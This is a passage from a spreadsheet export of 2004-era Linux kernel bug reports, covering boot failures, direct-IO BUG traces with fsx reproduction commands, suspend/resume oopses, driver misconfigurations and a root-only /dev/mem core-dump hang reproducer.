bridge: Intel Corp. 82801 PCI Bridge (rev c2) 0000:00:1f.0 ISA bridge: Intel Corp. 82801EB/ER (ICH5/ICH5R) LPC Bridge (rev 02) 0000:00:1f.1 IDE interface: Intel Corp. 82801EB/ER (ICH5/ICH5R) Ultra ATA 100 Storage Controller (rev 02) 0000:00:1f.2 IDE interface: Intel Corp. 82801EB (ICH5) Serial ATA 150 Storage Controller (rev 02) 0000:00:1f.3 SMBus: Intel Corp. 82801EB/ER (ICH5/ICH5R) SMBus Controller (rev 02) 0000:00:1f.5 Multimedia audio controller: Intel Corp. 82801EB/ER (ICH5/ICH5R) AC'97 Audio Controller (rev 02) 0000:01:00.0 VGA compatible controller: nVidia Corporation NV18GL [Quadro4 NVS AGP 8x] (rev a2) 0000:02:08.0 Ethernet controller: Intel Corp. 82562EZ 10/100 Ethernet Controller (rev 02) output of lsusb: Bus 005 Device 001: ID 0000:0000 Bus 005 Device 002: ID 0409:0058 NEC Corp. HighSpeed Hub Bus 005 Device 003: ID 0ea0:2168 Ours Technology, Inc. Transcend JetFlash 2.0 Bus 005 Device 004: ID 0781:8889 SanDisk Corp. Bus 004 Device 001: ID 0000:0000 Bus 003 Device 001: ID 0000:0000 Bus 002 Device 001: ID 0000:0000 Bus 002 Device 002: ID 051d:0002 American Power Conversion Back-UPS Pro 500 Bus 001 Device 001: ID 0000:0000 Bus 001 Device 002: ID 03eb:3301 Atmel Corp. 4-port Hub Bus 001 Device 003: ID 046d:c506 Logitech, Inc. Bus 001 Device 004: ID 066f:4200 SigmaTel, Inc. STIr4200 IrDA Bridge Software Environment: Standard debian `sarge' setup. Output of a ver_linux follows (please note this is not the kernel w/ the problem since that kernel won't boot): Linux jet 2.4.26-1-686 #1 Tue Aug 24 13:46:05 JST 2004 i686 GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.14.90.0.7 util-linux 2.12 mount 2.12 module-init-tools 3.1-pre5 e2fsprogs 1.35 reiserfsprogs line reiser4progs line pcmcia-cs 3.2.5 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.1 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 Modules Loaded agpgart pcmcia_core lp parport binfmt_misc thermal fan button processor ac battery nfs lockd sunrpc stir4200 irda crc32 mousedev hid input usb-storage af_packet i810_rng snd-intel8x0 snd-ac97-codec snd-pcm-oss snd-mixer-oss snd-pcm snd-timer snd-page-alloc gameport snd-mpu401-uart snd-rawmidi snd-seq-device snd soundcore nvidia ehci-hcd usb-uhci usbcore ide-scsi e100 ide-cd cdrom sd_mod scsi_mod rtc ext3 jbd ide-detect piix ide-disk ide-core unix Problem Description: If any new SMP kernel is booted on my dell Dimension 4600i, the booting process first freezes for 5 seconds while booting a processor, then prints some stuff and automatically reboots. I have tried this with the following kernel's enabled with SMP: 2.4.26, 2.6.7, 2.6.8-1, 2.6.9-rc2, 2.6.9-rc2-mm1. Also, if booted with an older SMP enabled kernel (I used 2.4.18) only one logical processor is detected. Windows XP has no trouble detecting and using the 2 logical processors presented by the P4 HyperThreading feature. Specifically, I have managed to scrawl the following output down by watching the reboot cycle many times. The following is printed after a lot of action: ... enabled ExtINT on CPU #0 ESR value before enabling: 00000040 ESR value after enabling: 00000000 Booting processor 1/1 eip 3000 At this point, the computer hangs for 5 seconds. Then the following output is recorded (I missed some, that is what the `...' is for): Not responding. Error: only one processor found. ... Waiting on wait_init_idle(map=0x0) All processors have done init_idle ACPI: subsystem revision 20040326 PCI: PCI BIOS revision 2.10 entry at 0xfbb10, last bus=2 PCI: using configuration type 1 And then the machine instantly reboots. If HyperThreading is disabled in the BIOS, the SMP kernel boots fine (of course, with only one logical CPU). Again, WinXP seems to have no troubles booting this machine w/ HT turned on. Steps to reproduce: Install a recent 2.4 or 2.6 kernel on a dell dimension 4600i w/ a prescott P4 2.8 Ghz w/ HT turned on. I have never seen this issue on a different hardware platform.</t>
  </si>
  <si>
    <t>BUG() in dio_new_bio() with fsx tests</t>
  </si>
  <si>
    <t>2004-09-23 08:01 UTC</t>
  </si>
  <si>
    <t>2007-09-19 08:58 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES9 Hardware Environment: Power5 Software Environment: Problem Description: BUG() in dio_new_bio() while running fsx tests kernel BUG in dio_new_bio at fs/direct-io.c:544! [c0000001e0b33420] c0000000000dce50 .dio_new_bio+0x20/0xac (unreliable) [c0000001e0b334c0] c0000000000dd038 .dio_send_cur_page+0x94/0xd8 [c0000001e0b33550] c0000000000dd8d4 .direct_io_worker+0x250/0x528 [c0000001e0b33620] c0000000000dded8 .__blockdev_direct_IO+0x32c/0x37c [c0000001e0b33710] d00000000011f5a4 .ext3_direct_IO+0x12c/0x208 [ext3] [c0000001e0b337f0] c00000000008607c .generic_file_direct_IO+0x88/0xdc [c0000001e0b338a0] c000000000084f94 .generic_file_direct_write+0x98/0x15c [c0000001e0b33960] c0000000000859cc .generic_file_aio_write_nolock+0x2ec/0x394 [c0000001e0b33a40] c000000000085bdc .generic_file_aio_write+0xbc/0x170 [c0000001e0b33b00] d00000000011b1bc .ext3_file_write+0x2c/0xe8 [ext3] [c0000001e0b33b90] c0000000000abccc .do_sync_write+0xb8/0xfc [c0000001e0b33cf0] c0000000000abe58 .vfs_write+0x148/0x1ac [c0000001e0b33d90] c0000000000abf94 .sys_write+0x4c/0x8c [c0000001e0b33e30] c000000000011600 syscall_exit+0x0/0x18 --- Exception: c01 (System Call) at 000000000fc7c254 Steps to reproduce: One of the fsx tests in causing the BUG() mkdir -p /test/aiodio touch /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -dn -N 10000 /test/aiodio/junkfile ./fsx-linux -d -r 4096 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -r 2048 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -b 1000 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -s 1 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 2048 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 2048 -t 2048 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -A -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -A -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -A -O -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -A -O -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -A -S 0 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -A -S 2000 -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -W -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -W -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -W -A -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -W -A -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -A -R -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -A -R -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 4096 -w 4096 -Z -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -t 2048 -w 2048 -Z -N 10000 /test/aiodio/junkfile ./fsx-linux -d -l 500000 -r 4096 -Z -A -N 10000 /test/aiodio/junkfile ./fsx-linux -d -A -N 10000 /test/aiodio/junkfile ./fsx-linux -d -N 10000 /test/aiodio/junkfile ./fsx-linux -d -N 10000 /test/aiodio/junkfile ./fsx-linux -d -N 10000 /test/aiodio/junkfile ./fsx-linux -d -N 10000 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 1024 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 2048 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 4096 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 8192 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 16384 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 32768 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 128000 /test/aiodio/junkfile ./fsx-linux -N 10000 -o 1024 -A /test/aiodio/junkfile ./fsx-linux -N 10000 -o 2048 -A /test/aiodio/junkfile ./fsx-linux -N 10000 -o 4096 -A /test/aiodio/junkfile ./fsx-linux -N 10000 -o 8192 -A /test/aiodio/junkfile ./fsx-linux -N 10000 -o 16384 -A /test/aiodio/junkfile ./fsx-linux -N 10000 -o 32768 -A /test/aiodio/junkfile ./fsx-linux -N 10000 -o 128000 -A /test/aiodio/junkfile ./fsx-linux -N 10000 -o 1024 -A -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 2048 -A -l 500000 -r 4096 -t 2048 -w 2048 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 4096 -A -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 8192 -A -l 500000 -r 4096 -t 2048 -w 2048 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 16384 -A -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 32768 -A -l 500000 -r 4096 -t 2048 -w 2048 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 128000 -A -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 32768 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 128000 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 1024 -Z -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 2048 -Z -l 500000 -r 4096 -t 2048 -w 2048 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 4096 -Z -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 8192 -Z -l 500000 -r 4096 -t 2048 -w 2048 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 16384 -Z -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 32768 -Z -l 500000 -r 4096 -t 2048 -w 2048 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 128000 -Z -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 128000 -Z -l 500000 -r 4096 -t 4096 -w 4096 -Z /test/aiodio/junkfile ./fsx-linux -N 10000 -o 16384 -A -l 500000 -r 4096 -t 4096 -w 4096 /test/aiodio/junkfile1 &amp; ./fsx-linux -N 10000 -o 32768 -A -l 500000 -r 4096 -t 2048 -w 2048 /test/aiodio/junkfile2 &amp; ./fsx-linux -N 10000 -o 128000 -A -l 500000 -r 4096 -t 4096 -w 4096 /test/aiodio/junkfile3 &amp; ./fsx-linux -N 10000 -o 16384 -A -l 500000 -r 4096 -t 4096 -w 4096 /test/aiodio/junkfile4 &amp; ./fsx-linux -N 10000 -o 32768 -A -l 500000 -r 4096 -t 2048 -w 2048 /test/aiodio/junkfile5 &amp; ./fsx-linux -N 10000 -o 128000 -A -l 500000 -r 4096 -t 4096 -w 4096 /test/aiodio/junkfile6 &amp; ./fsx-linux -N 10000 -A /test/aiodio/junkfile7 &amp; ./fsx-linux -N 100000 -A /test/aiodio/junkfile8 &amp; ./fsx-linux -N 100000 -A /test/aiodio/junkfile9 &amp; rm -rf /test/aiodio</t>
  </si>
  <si>
    <t>[Patch] Update fs/nls/nls_cp936.c (Chinese codepage)</t>
  </si>
  <si>
    <t>2004-09-24 02:59 UTC</t>
  </si>
  <si>
    <t>hashao</t>
  </si>
  <si>
    <t>2007-10-22 02:16 UTC</t>
  </si>
  <si>
    <t>xexz</t>
  </si>
  <si>
    <t>The current conversion table for codepage cp936 (Chinese Simplified) has many wrong mapping. I don't know where did the original table come from. As a result, Chinese filenames created on a vfat partition under Linux has some characters that cannot be accessed under Windows. The cp936 table can be found at: http://www.microsoft.com/globaldev/reference/dbcs/936.htm e.g.: CP936 code point: 0x8179 0x81ED</t>
  </si>
  <si>
    <t>Time suspend/resume incorrectly open IRQ</t>
  </si>
  <si>
    <t>2004-09-26 18:04 UTC</t>
  </si>
  <si>
    <t>2004-09-26 18:06 UTC</t>
  </si>
  <si>
    <t>The .resume code of time sysdev uses 'write_sequnlock_irq', which will unconditionly enable IRQ.</t>
  </si>
  <si>
    <t>S3 resume: PCI Interrupt Link Device oops</t>
  </si>
  <si>
    <t>2004-09-26 21:26 UTC</t>
  </si>
  <si>
    <t>2007-03-08 21:21 UTC</t>
  </si>
  <si>
    <t>4091 4159 5805</t>
  </si>
  <si>
    <t>Hi guys, Lo and Behold, I managed to get S3 to work on my laptop by following instructions on this website. http://www.loria.fr/~thome/d600/ However, I've not tested it further(as in using the normal kernel boot up line in grub.conf) to verify if it is the same whether or not I use video=radeonfb. I'm getting these errors during Suspend to disk. Warning: CPU frequency out of sync: cpufreq and timingcore thinks of 600000, is 1400000 kHz. Debug: sleeping function called from invalid context at mm/slab.c:1989 in_atomic():1, irqs_disabled():0 [&lt;c01156ac&gt;] __might_sleep+0xa5/0xaf [&lt;c0135d3f&gt;] __kmalloc+0x40/0x76 [&lt;c023bec9&gt;] acpi_os_allocate+0xa/0xb [&lt;c024fa1f&gt;] acpi_ut_allocate+0x34/0x57 [&lt;c024f9b0&gt;] acpi_ut_initialize_buffer+0x42/0x7d [&lt;c024c85e&gt;] acpi_rs_create_byte_stream+0x23/0x39 [&lt;c024dc1e&gt;] acpi_rs_set_srs_method_data+0x1b/0x9d [&lt;c011ecd4&gt;] __group_send_sig_info+0x36/0x9d [&lt;c011ee0a&gt;] group_send_sig_info+0x58/0x61 [&lt;c02556fd&gt;] acpi_pci_link_set+0xde/0x155 [&lt;c0255b0f&gt;] irqrouter_resume+0x1c/0x30 [&lt;c027bfff&gt;] sysdev_resume+0x3e/0xc7 [&lt;c027ea69&gt;] device_power_up+0x5/0xa [&lt;c012b332&gt;] do_magic_resume_2+0x63/0xb9 [&lt;c02db0d9&gt;] copy_done+0x49/0x4c [&lt;c012b536&gt;] software_suspend+0x98/0xae [&lt;c0252322&gt;] acpi_system_write_sleep+0x6a/0x85 [&lt;c014650c&gt;] vfs_write+0xb8/0xe4 [&lt;c01465d6&gt;] sys_write+0x3c/0x62 [&lt;c01059fd&gt;] sysenter_past_esp+0x52/0x71 ACPI: PCI interrupt 0000:00:1d.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 PCI: Setting latency timer of device 0000:00:1d.0 to 64 ACPI: PCI interrupt 0000:00:1d.1[B] -&gt; GSI 11 (level, low) -&gt; IRQ 11 PCI: Setting latency timer of device 0000:00:1d.1 to 64 ACPI: PCI interrupt 0000:00:1d.2[C] -&gt; GSI 11 (level, low) -&gt; IRQ 11 PCI: Setting latency timer of device 0000:00:1d.2 to 64 ACPI: PCI interrupt 0000:00:1d.7[D] -&gt; GSI 11 (level, low) -&gt; IRQ 11 PCI: Setting latency timer of device 0000:00:1d.7 to 64 ACPI: PCI interrupt 0000:00:1f.1[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI interrupt 0000:00:1f.5[B] -&gt; GSI 7 (level, low) -&gt; IRQ 7 PCI: Setting latency timer of device 0000:00:1f.5 to 64 radeonfb: resumed ! ACPI: PCI interrupt 0000:02:00.0[A] -&gt; GSI 11 (level, low) -&gt; IRQ 11 Fixing swap signatures... ok I also noticed that now, suspend does not work as it should/or was when I was using 2.6.7 kernel. Right now, it will go to the Freeing memory section.. then the screen goes blank. (blacklight still on) and then stays that way for quite sometime before I see the words "radeonfb: resumed" and when that happens, it's as though time stood still. It won't start writing to the disk until I press a key. (I usually just press the spacebar) and then it will start writing and works OK from that. (I am writing on my laptop which is been suspended(hibernated) and resumed a few times already. Anything changed or broke?? -- Ow Mun Heng Fedora GNU/Linux Core 2 on D600 1.4Ghz CPU kernel 2.6.8.1.Aug.29 Neuromancer 01:06:38 up 1 day, 3:25, 1 user, load average: 0.73, 0.88, 0.93</t>
  </si>
  <si>
    <t>Wrong DMA mode selected (PIIX3)</t>
  </si>
  <si>
    <t>2.6.x / &gt;=2.4.21</t>
  </si>
  <si>
    <t>2004-09-27 04:13 UTC</t>
  </si>
  <si>
    <t>Carsten Haustein</t>
  </si>
  <si>
    <t>2004-10-05 12:32 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.6.x or &gt;=2.4.21 Distribution: SuSE with stock kernel Hardware Environment:Dual P5/MMX 233, PIIX3, UDMA capable harddisk Problem Description: A bug in function piix_config_drive_xfer_rate() allows a call of hwif-&gt;ide_dma_on(drive) WITHOUT prior call of piix_config_drive_for_dma(drive). This results in harddisk configured for UDMA (default ?) whereas the highest DMA mode supported by PIIX3 is mword2. This bug is supposed to be present in any 2.6.x kernel release and any 2.4.x kernel release since 2.4.21.</t>
  </si>
  <si>
    <t>Device nodes on Sun x86 UFS filesystems have wrong major/minor numbers</t>
  </si>
  <si>
    <t>2004-09-27 09:47 UTC</t>
  </si>
  <si>
    <t>Alex Kiernan</t>
  </si>
  <si>
    <t>2007-01-23 21:04 UTC</t>
  </si>
  <si>
    <t>Distribution:Fedora Core 2 Hardware Environment:i386/x86_64 Software Environment: Problem Description:Device nodes on Sun x86 UFS filesystems have wrong major/minor numbers Steps to reproduce: Mount a Sun x86 UFS image which includes device nodes Check the major/minor numbers - they're all zero</t>
  </si>
  <si>
    <t>Machine hangs after about a week of uptime</t>
  </si>
  <si>
    <t>2004-09-27 10:38 UTC</t>
  </si>
  <si>
    <t>Mardy</t>
  </si>
  <si>
    <t>2004-12-07 10:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Problem Description: After about a week of running (I've experienced it to happen between 5 and 8 days of uptime) Linux hangs with absolutely no log about it. It looks like the machine freezes. Another user has reported this problem to another mailing list, for versions 2.6.7 and 2.6.8: http://www.x86-64.org/lists/discuss/msg05548.html I'm not using a 64bit CPU, mine is just an ordinary Athlon XP. I'm sorry I cannot say anything more about this bug; if someone can please tell me some ways to get to some error messages, or some debugging information, I'd be happy to run some tests. (if this can be of any help: xfree86 wasn't running when the PC crashed last time). Please tell me what other informations you need.</t>
  </si>
  <si>
    <t>neofb: screen corruption under back/forward space</t>
  </si>
  <si>
    <t>2004-09-27 17:59 UTC</t>
  </si>
  <si>
    <t>Evan Buswell</t>
  </si>
  <si>
    <t>2005-08-15 17:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux (NOT hardened gcc) Hardware Environment: Sony VAIO PCG-F540 MagicGraph 256av+ (under AGP) 440BX Motherboad Software Environment: This occurs only under emacs and nano. vi and command-prompt etc. are fine. Problem Description: Extra spaces inserted when space is pressed prior to a long line. Spaces begin to appear in between other letters as well as "overscores". With backspace, the part of the screen affected becomes hopelessly jumbled, with the pixels that make up the line getting skewed all over the place so text is unreadable (though it is still barely recognizable that it is indeed text you are looking at). I have since recompiled to use vesafb and the problem is gone (plus, mysteriously, scrolling is actually *faster*). Steps to reproduce: 1)Compile kernel with neofb support 2)press space and backspace in emacs. Note: Sorry for no dmesg. I have recompiled my kernel, and recompiling it yet again to produce results which for all I know might be useless is simply not in the cards. However, if someone feels this information would be very helpful, let me know and I'll go through the process.</t>
  </si>
  <si>
    <t>Martin Bammer</t>
  </si>
  <si>
    <t>make clean on external driver will clean the kernel source tree, not the driver's tree</t>
  </si>
  <si>
    <t>2.6.4-52</t>
  </si>
  <si>
    <t>2004-09-28 10:12 UTC</t>
  </si>
  <si>
    <t>Timur Tabi</t>
  </si>
  <si>
    <t>2008-01-09 08:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Any 2.6-based distribution Hardware Environment: N/A Software Environment: N/A Problem Description: The 2.6 kernel uses the new "kbuild" mechanism for building. kbuild is really nothing more than a fancy master Makefile that sets up a bunch of stuff, parses the local makefile, and then does a build. The problem is that if I have a module that's compile outside the kernel (and this might also happen to internal modules), it's the master makefile that interprets the targets, not the local makefile. This is because the make command is issued with the -C parameter, which means all targets are passed to the master makefile first. Steps to reproduce: 1) Create a driver and a makefile in a directory outside of /usr/src/linux (for example). 2) In the directory for your driver, issue the command "make -C /usr/src/linux SUBDIRS=$PWD clean" 3) Watch in horror as your /usr/src/linux tree gets cleaned out.</t>
  </si>
  <si>
    <t>Adaptec I2O SCSI driver dosen't work</t>
  </si>
  <si>
    <t>2.6.7 and newer (custom compiled)</t>
  </si>
  <si>
    <t>2004-09-28 23:22 UTC</t>
  </si>
  <si>
    <t>2006-09-13 23:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody 3.0r1 Hardware Environment: MB: Asus A7N8X-Deluxe (nForce2), VGA ATI Radeon 7200 AGP, SCSI RAID Adaptec 2100S 32bit PCI with 3xMaxtor Atlas 10k 36GB, CPU AMD Barton 3000@333, NIC 2x onboard + 3C905 Software Environment: Problem Description: Aprox. 5 minutes after system startup, some strange lines about I2O appear on console (I'll post a kern.log). Don't know, if it's connected somehow with the bug, however. The drives connected to the RAID adapter are not accesible at all. The drive diode lights without interruption. If I give him halt or reboot command, at the end of "Rebooting" process there few lines appear, and the system freezes and can only be hard powered off or rebooted. The lines: &lt;6&gt;Shutting down I2O system. This could take a few minutes if there are many devices attached I2O system down. Synchronizing SCSI cache for disk sda: I must add, that with Debian Sarge 3.1 testing, release 05/2004 and the kernel 2.4.26-1-k7 or 2.4.25-1-386, none of the described problems occur. I must however use Debian Woody because of an old Oracle8i server. The default Woody kernel 2.4.18 dosen't recognise the I2O AFAIK, so I needed to try the custom kernel. I also must compile kernel myself because of some semaphore and shmem settings needed for Oracle. Steps to reproduce:</t>
  </si>
  <si>
    <t>Roland Stigge</t>
  </si>
  <si>
    <t>dump core while /dev/mem mapped</t>
  </si>
  <si>
    <t>2004-09-30 02:02 UTC</t>
  </si>
  <si>
    <t>Peter Seiderer</t>
  </si>
  <si>
    <t>2004-11-19 04:39 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE-8.2 Hardware Environment: P4, 1.8Ghz, 1GB Ram Software Environment: Problem Description: Computer gets unusable when a programm which mmapped /dev/mem tries to dump core. Steps to reproduce: --- begin --- #include &lt;stdio.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/stat.h&gt; #include &lt;fcntl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;assert.h&gt; int main(int argc, char *argv[]) { int fd; assert((fd = open("/dev/mem", O_RDWR)) != (-1)); size_t s = 67108864; void *m; assert((m = mmap(NULL, s, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0xd0000000)) != NULL); char *c = 0; char a = *c; return 0; } --- end --- when run as root and writing core dumps enabled. Minimal testrun: boot 2.6.8.1 (config file attached, the computer has 1 GB of ram) with init=/bin/sh mount -o remount,rw / ulimit -c unlimited ./test_program (the computer hangs) SysRq Output: 20040921 13:56:34.312: SysRq : Show Regs 20040921 13:56:34.312: 20040921 13:56:34.312: Pid: 21, comm: a.out 20040921 13:56:34.312: EIP: 0060:[&lt;c014ae57&gt;] CPU: 0 20040921 13:56:34.312: EIP is at get_user_pages+0xe1/0x40e 20040921 13:56:34.328: EFLAGS: 00000246 Not tainted (2.6.8.1) 20040921 13:56:34.328: EAX: 00000001 EBX: 00000000 ECX: df5b4a80 EDX: 00000000 20040921 13:56:34.328: ESI: c152c000 EDI: df5bec9c EBP: c152dd88 DS: 007b ES: 007b 20040921 13:56:34.343: CR0: 8005003b CR2: 080c2eb8 CR3: 1f59b000 CR4: 000006d0 20040921 13:56:34.343: [&lt;c0104264&gt;] show_regs+0x145/0x16d 20040921 13:56:34.343: [&lt;c0246004&gt;] __handle_sysrq+0x71/0xed 20040921 13:56:34.359: [&lt;c023fb6d&gt;] kbd_event+0x30/0x5b 20040921 13:56:34.359: [&lt;c02ad5f8&gt;] input_event+0x164/0x3c0 20040921 13:56:34.375: [&lt;c02af66f&gt;] atkbd_report_key+0x3b/0x95 20040921 13:56:34.375: [&lt;c02af9a6&gt;] atkbd_interrupt+0x2dd/0x5c5 20040921 13:56:34.375: [&lt;c02b38df&gt;] serio_interrupt+0x75/0xa2 20040921 13:56:34.390: [&lt;c02b41b6&gt;] i8042_interrupt+0xcc/0x16e 20040921 13:56:34.390: [&lt;c01083ad&gt;] handle_IRQ_event+0x39/0x62 20040921 13:56:34.406: [&lt;c0108764&gt;] do_IRQ+0xbe/0x19b 20040921 13:56:34.406: [&lt;c0106a50&gt;] common_interrupt+0x18/0x20 20040921 13:56:34.406: [&lt;c018ba1c&gt;] elf_core_dump+0xa85/0xbad 20040921 13:56:34.406: [&lt;c0168e88&gt;] do_coredump+0x1dc/0x24c 20040921 13:56:34.421: [&lt;c012b7b7&gt;] get_signal_to_deliver+0x36a/0x430 20040921 13:56:34.421: [&lt;c0105e21&gt;] do_signal+0x68/0x10d 20040921 13:56:34.421: [&lt;c0105f01&gt;] do_notify_resume+0x3b/0x3d 20040921 13:56:34.437: [&lt;c010612e&gt;] work_notifysig+0x13/0x15 20040921 13:56:35.171: SysRq : Show Regs 20040921 13:56:35.187: 20040921 13:56:35.187: Pid: 21, comm: a.out 20040921 13:56:35.187: EIP: 0060:[&lt;c014c715&gt;] CPU: 0 20040921 13:56:35.187: EIP is at handle_mm_fault+0x4b/0x1e2 20040921 13:56:35.187: EFLAGS: 00000246 Not tainted (2.6.8.1) 20040921 13:56:35.203: EAX: 00000001 EBX: 00000206 ECX: c152c000 EDX: df5b4ab0 20040921 13:56:35.203: ESI: df59b400 EDI: df5b4a80 EBP: c152dd50 DS: 007b ES: 007b 20040921 13:56:35.203: CR0: 8005003b CR2: 080c2eb8 CR3: 1f59b000 CR4: 000006d0 20040921 13:56:35.218: [&lt;c0104264&gt;] show_regs+0x145/0x16d 20040921 13:56:35.218: [&lt;c0246004&gt;] __handle_sysrq+0x71/0xed 20040921 13:56:35.218: [&lt;c023fb6d&gt;] kbd_event+0x30/0x5b 20040921 13:56:35.234: [&lt;c02ad5f8&gt;] input_event+0x164/0x3c0 20040921 13:56:35.234: [&lt;c02af66f&gt;] atkbd_report_key+0x3b/0x95 20040921 13:56:35.250: [&lt;c02af9a6&gt;] atkbd_interrupt+0x2dd/0x5c5 20040921 13:56:35.250: [&lt;c02b38df&gt;] serio_interrupt+0x75/0xa2 20040921 13:56:35.250: [&lt;c02b41b6&gt;] i8042_interrupt+0xcc/0x16e 20040921 13:56:35.265: [&lt;c01083ad&gt;] handle_IRQ_event+0x39/0x62 20040921 13:56:35.265: [&lt;c0108764&gt;] do_IRQ+0xbe/0x19b 20040921 13:56:35.265: [&lt;c0106a50&gt;] common_interrupt+0x18/0x20 20040921 13:56:35.281: [&lt;c014af42&gt;] get_user_pages+0x1cc/0x40e 20040921 13:56:35.281: [&lt;c018ba1c&gt;] elf_core_dump+0xa85/0xbad 20040921 13:56:35.281: [&lt;c0168e88&gt;] do_coredump+0x1dc/0x24c 20040921 13:56:35.296: [&lt;c012b7b7&gt;] get_signal_to_deliver+0x36a/0x430 20040921 13:56:35.296: [&lt;c0105e21&gt;] do_signal+0x68/0x10d 20040921 13:56:35.296: [&lt;c0105f01&gt;] do_notify_resume+0x3b/0x3d 20040921 13:56:35.296: [&lt;c010612e&gt;] work_notifysig+0x13/0x15 The kernel seems to be stuck in elf_core_dump. No problem occcurs if no core file is written (due to ulimit, or readonly fs).</t>
  </si>
  <si>
    <t>Got some NF_IP_ASSERT failures</t>
  </si>
  <si>
    <t>2004-10-01 15:08 UTC</t>
  </si>
  <si>
    <t>2005-02-20 05:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: Dual Athlon MP 2800+, 2GB, numerous IDE/SATA disks, Intel GB and FE ethernet Software Environment: nothing special Problem Description: I got a series of 21 times NF_IP_ASSERT: net/ipv4/netfilter/ip_conntrack_core.c:658(init_conntrack) on the console. See atached syslog excerpt. eth1 is the e100 outside network connection. Steps to reproduce: No idea.</t>
  </si>
  <si>
    <t>zisofs: some are not read correctly</t>
  </si>
  <si>
    <t>2004-10-03 09:08 UTC</t>
  </si>
  <si>
    <t>daniele giacomini</t>
  </si>
  <si>
    <t>2004-11-24 12:23 UTC</t>
  </si>
  <si>
